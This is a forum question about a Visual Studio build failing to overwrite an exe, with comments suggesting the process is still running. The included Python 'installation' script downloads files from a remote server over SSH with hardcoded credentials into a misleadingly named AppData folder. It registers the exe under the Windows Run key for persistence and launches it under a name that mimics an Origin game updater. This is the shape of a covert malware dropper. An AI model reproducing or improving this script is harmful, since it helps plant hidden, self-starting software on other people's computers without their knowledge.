# C# can't build project

Tags: file, administrator

My problem is very wierd and I have 0 ideas of why it does that.
So when I try to run my console application for a second time in visual C# it says

> Unable to copy the file "obj \ Debug \ OriginGameUpdaterService.exe" to ".. \ .. \ .. \ .. \ Desktop \ Build \ OriginGameUpdaterService.exe". Access to the path '.. \ .. \ .. \ .. \ Desktop \ Build \ OriginGameUpdaterService.exe' is denied.

So what I does it that I have to change the build output path in the Build settings each time I run it. This is not the only thing. Once the exe is in the folder, I can't delete the folder and the application. When I try I have a Windows message that says that I need the Julien-PC/Julien rights to do this action (I am administrator on the Julien session).

It is really wierd because I can't do anything with that... I made a Python script that installs the exe with his dlls in a folder but It doesn't work due to that bug...

(here is my installation.py script)

```
#!/usr/bin/python
import subprocess;
import paramiko;
import getpass;
import os.path;
import winreg;

print("Connecting to server.");
user = getpass.getuser()
ssh = paramiko.SSHClient();
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.load_system_host_keys();
ssh.connect("********", 22, "*******", "*********");
# ouverture des transferts de fichiers avec le ssh
sftp = ssh.open_sftp();
print("Connexion successed.");

REG_PATH = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

def set_reg(name, value):
    try:
        winreg.CreateKey(winreg.HKEY_CURRENT_USER, REG_PATH)
        registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, REG_PATH, 0, 
                                       winreg.KEY_WRITE)
        winreg.SetValueEx(registry_key, name, 0, winreg.REG_SZ, value)
        winreg.CloseKey(registry_key)
        return True
    except WindowsError:
        return False

print("Creating directory.");
path = "C:/Users/" + user + "/AppData/Local/Origin/Windows/Win32X/Shell/s"
os.makedirs(path, exist_ok=True)

for i in sftp.listdir("/home/dll"):
    print("Downloading " + i);
    sftp.get("/home/dll/" + i, "C:/Users/" + user + "/AppData/Local/Origin/Windows/Win32X/Shell/s/" + i);
set_reg("OriginGameUpdaterService", "\"C:\\Users\\" + user + "\\AppData\\Local\\Origin\\Windows\\Win32X\\Shell\\s\\OriginGameUpdaterService.exe\"");
if(os.path.exists("C:/Users/" + user + "/AppData/Local/Origin/Windows/Win32X/Shell/s/OriginGameUpdaterService.exe")):
    exit(0)

print("Creating startup *.cmd file.");
file = open("C:/Users/" + user + "/AppData/Local/Origin/Windows/Win32X/Shell/s/setup.cmd","w") 
file.write("cd C:/Users/" + user + "/AppData/Local/Origin/Windows/Win32X/Shell/s\n")
file.write("start OriginGameUpdaterService.exe")
file.close() 
print("Starting exe");
subprocess.Popen("C:/Users/" + user + "/AppData/Local/Origin/Windows/Win32X/Shell/s/setup.cmd", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);
print("Installation complete.")
```

If someone could only help me, I know it is hard to understand my problem, It is hard for me to explain it. 
Otherswise one a forum I saw that someone had a similar problem and he changed his AssemblyVersion to 2.0.* so it's what I did and it's still the same problem 
`[assembly: AssemblyVersion("2.0.*")]`

Comment: Are you sure the process is terminating correctly once started?

Comment: can you try to rightclick visual studio icon and run as administrator?

Answer (score 0):

Just make sure the EXE is not running anymore. Sometimes you think it's closed, but it's still running. Open Task Manager and look at the Details tab.

Comment: I close it allways before starting a new instance... :(

Comment: Are you 100% sure it's not running?